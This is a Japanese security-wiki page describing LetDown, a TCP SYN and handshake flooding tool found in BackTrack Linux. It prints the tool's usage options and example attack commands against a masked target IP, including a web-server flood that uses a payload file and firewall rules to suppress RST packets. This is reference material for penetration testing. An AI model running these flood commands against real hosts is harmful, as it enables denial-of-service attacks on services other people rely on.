「LetDown」の版間の差分
提供: セキュリティ
(ページの作成:「<!-- vim: filetype=mediawiki --> [[{{PAGENAME}}]] とは、TCP SYN パケットをターゲットのIPアドレスのポートに送信する攻撃ツールです...」) |
(相違点なし)
|
2013年5月19日 (日) 14:42時点における最新版
LetDown とは、TCP SYN パケットをターゲットのIPアドレスのポートに送信する攻撃ツールです。
読み方
- LetDown
- れっと だうん
概要
LetDown とは、TCP SYN パケットをターゲットのIPアドレスのポートに送信する攻撃ツールです。
インストール
BackTrack Linux では、 /pentest/stressing/letdown にあります。
使い方
$ ./letdown LetDown 3wh+payload flooder v0.7.7.2 - Acri Emanuele (crossbower@gmail.com) Usage: letdown -d dst_ip -p dst_port -D dst_mac [options] Options: -d destination ip address, target -D destination mac address or router mac address -p destination port -s source ip address -S source mac address -x first source port (default 1025) -y last source port (default 65534) -l enables infinite loop mode -i network interface -t sleep time in microseconds (default 10000) -a max time in second for waiting responses Extra options: -v verbosity level (0=quiet, 1=normal, 2=verbose) -f automagically set firewall rules for blocking rst packet generated by the kernel examples: -f iptables, -f blackhole (for freebsd) -L special interaction levels with the target s syn flooding, no 3-way-handshake a send acknowledgment packets (polite mode) f send finalize packets (include polite mode) r send reset packets (check firewall rules...) -W window size for ack packets (ex: 0-window attack) -O enable ack fragmentation and set fragment offset delta -C fragment counter if fragmentation is enabled (default 1) -P payload file (see payloads directory...) -M multistage payload file (see payloads directory...)
一般的な攻撃
# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 21
Webサーバーに対して、ペイロードとファイアーウォールオプションを使った、攻撃。 Attack against a webserver using payload and firewall options:
# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -f iptables -P payloads/http.txt
1024未満の3つのポートに対する接続とタイムオプション。
# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -x 80 -y 100 -t 10000